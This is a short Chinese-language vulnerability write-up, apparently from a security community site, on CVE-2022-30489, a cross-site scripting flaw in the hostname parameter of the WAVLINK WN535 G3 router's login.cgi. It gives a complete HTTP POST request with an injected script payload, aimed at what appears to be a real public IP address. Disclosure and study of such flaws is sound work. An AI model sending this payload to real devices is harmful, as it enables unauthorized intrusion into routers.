WAVLINK WN535 G3跨站点脚本(XSS)漏洞CVE-2022-30489

破绽描绘

WAVLINK WN535 G3 经过/cgi-bin/login.cgi.National Vulnerability Database 中的主机名参数被发现包含一个跨站点脚本(XSS)破绽。CVE-2022-30489
 


 

影响版本

WAVLINK WN535G3
 


 

破绽复现

图片[1]-WAVLINK WN535 G3跨站点脚本(XSS)漏洞CVE-2022-30489-孤勇者社区

图片[2]-WAVLINK WN535 G3跨站点脚本(XSS)漏洞CVE-2022-30489-孤勇者社区

图片[3]-WAVLINK WN535 G3跨站点脚本(XSS)漏洞CVE-2022-30489-孤勇者社区

有效载荷

POST /cgi-bin/login.cgi HTTP/1.1
Host: 98.127.66.193
Content-Length: 255
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://98.127.66.193
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://98.127.66.193/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

newUI=1&page=login&username=admin&langChange=0&ipaddr=171.113.240.243&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</><>alert(1)</>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn

图片[4]-WAVLINK WN535 G3跨站点脚本(XSS)漏洞CVE-2022-30489-孤勇者社区

图片[5]-WAVLINK WN535 G3跨站点脚本(XSS)漏洞CVE-2022-30489-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞11赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像市三0
    • 头像杨虚0